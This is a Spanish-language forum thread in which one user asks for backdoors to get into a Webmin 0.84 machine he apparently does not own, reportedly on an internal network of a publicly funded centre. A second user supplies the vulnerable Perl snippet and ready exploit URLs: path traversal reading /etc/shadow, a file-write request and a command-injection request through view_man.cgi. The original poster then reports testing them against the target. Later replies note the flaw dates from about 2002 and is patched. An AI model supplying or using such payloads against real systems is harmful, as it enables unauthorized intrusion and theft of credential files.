Resultados 1 al 11 de 11

Tema: WeBMiN 0.84

  1. #1 WeBMiN 0.84 
    Avanzado
    Fecha de ingreso
    Nov 2001
    Ubicación
    Van Galia
    Mensajes
    434
    Descargas
    0
    Uploads
    0
    No se si valdrá de algo...
    Pero no consigo acceder a un ordenador regido por esta herramienta
    WeBMiN 0.84 (lo digo de memoria pero supongo que es esta versión)
    Si alguien conoce backdoors o bugs de este sistema comunicadmelo

    ...:::I'm here from beneath Earth:::...
    Citar  
     

  2. #2  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Como nadie ha respondido te pongo un par de exploits para el Webmin.A ver si tienes suerte , a mi me tienen funcionado.
    El fallo es este script del Webmin init/edit_action.cgi ke peta:
    <snip>
    open(FILE, $file);
    while(<FILE>) {
    $data .= $_;
    if (/^\s*(['\"]?)([a-z]+)\1\)/i) {
    $hasarg{$2}++;
    }
    }
    close(FILE);
    </snip>

    Estos son los exploits:

    Escribir archivos en el server:
    http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev

    No comment:
    http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow

    Aki hay otro donde peta el view_man.cgi :
    http://www.dominio.com:10000/man/view_man.cgi?page=ipcs&sec=8&opts=&for=rm
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Nov 2001
    Ubicación
    Van Galia
    Mensajes
    434
    Descargas
    0
    Uploads
    0
    Rebooting OrdenaDor In My LinUX For TesTing It
    Muchas Gracias Fiera!!!
    No se si funcionará pero eres el único que te has molestado

    ...:::I'm here from beneath Earth:::...
    Citar  
     

  4. #4  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Juas, si yo supiera, echaria un cable
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  5. #5  
    Avanzado
    Fecha de ingreso
    Nov 2001
    Ubicación
    Van Galia
    Mensajes
    434
    Descargas
    0
    Uploads
    0
    Lo he probado y en las versiones 0.89 0.90 0.88 0.87 estos fallos estan solventados. La mákina con el 0.84 tengo qeu tener acceso local ya que esta denegado el acceso a ip's externas. Seguiré informando

    ...:::I'm here from beneath Earth:::...
    Citar  
     

  6. #6  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Oka.O sea ke es un ordena de una red interna..mmm..mola xD.
    Citar  
     

  7. #7  
    Avanzado
    Fecha de ingreso
    Nov 2001
    Ubicación
    Van Galia
    Mensajes
    434
    Descargas
    0
    Uploads
    0
    Sip y además te puedo decir que es de un sitio con muchas ayudas de parte de la generalitat y que por llí pasan muchos estudiantes muy listos hasta el dia 7 que siga con mis pruebs :P

    ...:::I'm here from beneath Earth:::...
    Citar  
     

  8. #8  
    Iniciado
    Fecha de ingreso
    Jan 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    Citar  
     

  9. #9  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    Llegas un poco tarde no?? Mira la fecha del post.
    http://www.project-longinus.es
    Citar  
     

  10. #10  
    Iniciado
    Fecha de ingreso
    Jan 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    un aporte es un aporte smaug_, siempre puede haber alguien que nesecite informacion
    Citar  
     

  11. #11  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Valhala
    Mensajes
    1.167
    Descargas
    4
    Uploads
    0
    BUeno, aunque siendo una vulnerabilidad del 2002, creo que ya estara mas que subsanada.
    http://www.project-longinus.es
    Citar  
     

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •